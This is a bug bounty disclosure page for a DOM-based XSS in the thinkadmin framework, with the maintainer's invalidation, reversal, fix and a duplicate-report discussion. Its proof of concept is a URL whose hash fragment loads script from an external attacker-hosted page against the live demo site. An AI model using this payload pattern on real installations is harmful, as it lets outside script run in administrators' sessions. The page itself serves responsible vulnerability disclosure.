Cross-site Scripting (XSS) - DOM in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

DOM based xss via url hash frgament

Proof of Concept

First login into https://v6.thinkadmin.top and then visit https://v6.thinkadmin.top/admin.html#https://bbounty.000webhostapp.com/cors.php?id=xxxxx2 and see xss is executed

Impact

DOM based xss via url hash fragment

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back a year ago
邹景立 has invalidated this vulnerability a year ago

The framework design needs to use hash to load page resources and allows the use of JavaScript. Therefore, such problems are inevitable and need to be used.

The disclosure bounty has been dropped
The fix bounty has been dropped
ranjit-git
a year ago

Researcher


If you want to load hash fragment then only allow server url.
Here you can see I can set any arbitary url and it will fetch data

ranjit-git
a year ago

Researcher


Here in my poc url you can see it fetches any url. But you need to set url to be fetch from own server

邹景立
a year ago

Maintainer


I'm very sorry. After careful consideration, I decided to fix this problem, but it has been closed and can't be marked.

ranjit-git
a year ago

Researcher


@admin . I asking admin to re-open this bug so that you can validate the bug

邹景立
a year ago

Maintainer


OK, I also suggest the administrator to reopen it!

Jamie Slome
a year ago

Admin


I have updated the report to pending - feel free to mark it as you please!

邹景立 validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 4469f7 a year ago
邹景立 has been awarded the fix bounty
0x9x
a year ago

Nice find !

Jamie Slome
a year ago

Admin


@maintainer - just jumping in here!

We just want to know if you perceive this report to be a duplicate of:

https://huntr.dev/bounties/5c129785-cf80-4123-b869-3945b386139a/

邹景立
a year ago

Maintainer


@admin Confirm duplicate report.

0x9x
a year ago

i confirm the duplicated report , but not the verbose error reported on my original report . So i hope you can accept also my report .

Jamie Slome
a year ago

Admin


As we are in a unique situation, would both researchers be happy to split the bounty for the disclosure, half/half?

to join this conversation